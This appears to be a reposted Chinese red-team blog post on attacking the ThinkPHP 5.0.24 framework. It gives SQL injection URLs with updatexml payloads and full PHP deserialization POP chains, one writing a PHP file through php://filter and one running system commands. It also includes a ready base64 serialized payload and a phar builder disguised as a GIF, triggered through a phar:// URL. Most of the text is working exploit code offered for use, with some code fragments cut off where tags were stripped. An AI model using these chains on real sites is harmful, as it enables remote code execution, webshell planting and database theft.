红队攻击第3篇 thinkphp5框架 注入 反序列化写文件 phar反序列化 (qq.com)
1.SQL注入1
where("id = {$id}")->select(); echo ""; var_dump($result); echo "
"; }}
http://www.tp5024.com/index.php/index/index/test3/id/1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)
2.SQL注入2
get('username'); $result = db('users')->where('username','exp',$username)->select(); echo ""; var_dump($result); echo "
"; }}
http://www.tp123.com/index.php?m=index&c=index&username=)%20union%20select%20updatexml(1,concat(0x7,user(),0x7e),1)%23
3.thinkphp5 反序列化写文件
这里就以 thinkphp5.0.24 这个版本 其他版本大同小异
files = [new Pivot($path,$data)]; } } $data = base64_encode(''); echo "tp5.0.24 write file pop Chain\n"; echo "The '=' cannot exist in the data,please check:".$data."\n"; $path = 'php://filter/convert.base64-decode/resource=./'; $aaa = new Windows($path,$data); echo base64_encode(serialize($aaa)); echo "\n"; echo 'filename:'.md5('tag_'.md5(true)).'.php';}namespace think{ abstract class Model {}}namespace think\model{ use think\Model; class Pivot extends Model{ protected $append = []; protected $error; public $parent; public function __construct($path,$data){ $this->append['jelly'] = 'getError'; $this->error = new relation\BelongsTo($path,$data); $this->parent = new \think\console\Output($path,$data); } } abstract class Relation{}}namespace think\model\relation{ use think\db\Query; use think\model\Relation; abstract class OneToOne extends Relation{} class BelongsTo extends OneToOne{ protected $selfRelation; protected $query; protected $bindAttr = []; public function __construct($path,$data){ $this->selfRelation = false; $this->query = new Query($path,$data); $this->bindAttr = ['a'.$data]; } }}namespace think\db{ use think\console\Output; class Query{ protected $model; public function __construct($path,$data){ $this->model = new Output($path,$data); } }}namespace think\console{ use think\session\driver\Memcache; class Output{ protected $styles = []; private $handle; public function __construct($path,$data){ $this->styles = ['getAttr']; $this->handle = new Memcache($path,$data); } }}namespace think\session\driver{ use think\cache\driver\File; use think\cache\driver\Memcached; class Memcache{ protected $handler = null; protected $config = [ 'expire' => '', 'session_name' => '', ]; public function __construct($path,$data){ $this->handler = new Memcached($path,$data); } }}namespace think\cache\driver{ class Memcached { protected $handler; protected $tag; protected $options = []; public function __construct($path,$data){ $this->options = ['prefix' => '']; $this->handler = new File($path,$data); $this->tag = true; } }}namespace think\cache\driver{ class File { protected $options = []; protected $tag; public function __construct($path,$data){ $this->tag = false; $this->options = [ 'expire' => 0, 'cache_subdir' => false, 'prefix' => '', 'path' => $path, 'data_compress' => false, ]; } }}
在代码审计里如果发现unserialize这个函数传入的参数可控 就可以进行利用了 通常的情况下 是
unserialize(加密函数(传入值)) 这种模式居多 这里就以这个为例子。
http://www.tp5024.com/index.php/index/index/test1?data=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
4.thinkphp5 phar反序列化
首先 php里要关闭这个只读模式
thinkphp5.0.24 还有其他链子
files = [new Pivot($function,$parameter)]; } } $aaa = new Windows('system','whoami'); echo base64_encode(serialize($aaa));}namespace think{ abstract class Model {}}namespace think\model{ use think\Model; use think\console\Output; class Pivot extends Model{ protected $append = []; protected $error; public $parent; public function __construct($function,$parameter){ $this->append['jelly'] = 'getError'; $this->error = new relation\BelongsTo($function,$parameter); $this->parent = new Output($function,$parameter); } } abstract class Relation{}}namespace think\model\relation{ use think\db\Query; use think\model\Relation; abstract class OneToOne extends Relation{} class BelongsTo extends OneToOne{ protected $selfRelation; protected $query; protected $bindAttr = []; public function __construct($function,$parameter){ $this->selfRelation = false; $this->query = new Query($function,$parameter); $this->bindAttr = ['']; } }}namespace think\db{ use think\console\Output; class Query{ protected $model; public function __construct($function,$parameter){ $this->model = new Output($function,$parameter); } }}namespace think\console{ use think\session\driver\Memcache; class Output{ protected $styles = []; private $handle; public function __construct($function,$parameter){ $this->styles = ['getAttr']; $this->handle = new Memcache($function,$parameter); } }}namespace think\session\driver{ use think\cache\driver\Memcached; class Memcache{ protected $handler = null; protected $config = [ 'expire' => '', 'session_name' => '', ]; public function __construct($function,$parameter){ $this->handler = new Memcached($function,$parameter); } }}namespace think\cache\driver{ use think\Request; class Memcached{ protected $handler; protected $options = []; protected $tag; public function __construct($function,$parameter){ // pop链中需要prefix存在,否则报错 $this->options = ['prefix' => 'jelly/']; $this->tag = true; $this->handler = new Request($function,$parameter); } }}namespace think{ class Request { protected $get = []; protected $filter; public function __construct($function,$parameter){ $this->filter = $function; $this->get = ["jelly"=>$parameter]; } }}
这个是命令执行的 将它改成 phar 生成的包
files = [new Pivot($function,$parameter)]; } }}namespace { use think\process\pipes\Windows; $data= new Windows('system', 'whoami'); unlink('exp2.phar'); $phar = new Phar('exp2.phar'); $phar -> stopBuffering(); $phar->setStub("GIF89a"."");//设置stub $phar -> addFromString('test.txt','test'); $object = $data; $phar -> setMetadata($object); $phar -> stopBuffering();}namespace think{ abstract class Model {}}namespace think\model{ use think\Model; use think\console\Output; class Pivot extends Model{ protected $append = []; protected $error; public $parent; public function __construct($function,$parameter){ $this->append['jelly'] = 'getError'; $this->error = new relation\BelongsTo($function,$parameter); $this->parent = new Output($function,$parameter); } } abstract class Relation{}}namespace think\model\relation{ use think\db\Query; use think\model\Relation; abstract class OneToOne extends Relation{} class BelongsTo extends OneToOne{ protected $selfRelation; protected $query; protected $bindAttr = []; public function __construct($function,$parameter){ $this->selfRelation = false; $this->query = new Query($function,$parameter); $this->bindAttr = ['']; } }}namespace think\db{ use think\console\Output; class Query{ protected $model; public function __construct($function,$parameter){ $this->model = new Output($function,$parameter); } }}namespace think\console{ use think\session\driver\Memcache; class Output{ protected $styles = []; private $handle; public function __construct($function,$parameter){ $this->styles = ['getAttr']; $this->handle = new Memcache($function,$parameter); } }}namespace think\session\driver{ use think\cache\driver\Memcached; class Memcache{ protected $handler = null; protected $config = [ 'expire' => '', 'session_name' => '', ]; public function __construct($function,$parameter){ $this->handler = new Memcached($function,$parameter); } }}namespace think\cache\driver{ use think\Request; class Memcached{ protected $handler; protected $options = []; protected $tag; public function __construct($function,$parameter){ // pop链中需要prefix存在,否则报错 $this->options = ['prefix' => 'jelly/']; $this->tag = true; $this->handler = new Request($function,$parameter); } }}namespace think{ class Request { protected $get = []; protected $filter; public function __construct($function,$parameter){ $this->filter = $function; $this->get = ["jelly"=>$parameter]; } }}
找个地方上传 审计文件操作函数 然后传入就可以了。
一般的方法是上传图片 再用phar访问就能触发了
http://www.tp5024.com/index.php/index/index/test2?file=phar://exp2.gif/test.txt
来源地址:https://blog.csdn.net/weixin_57567655/article/details/127097871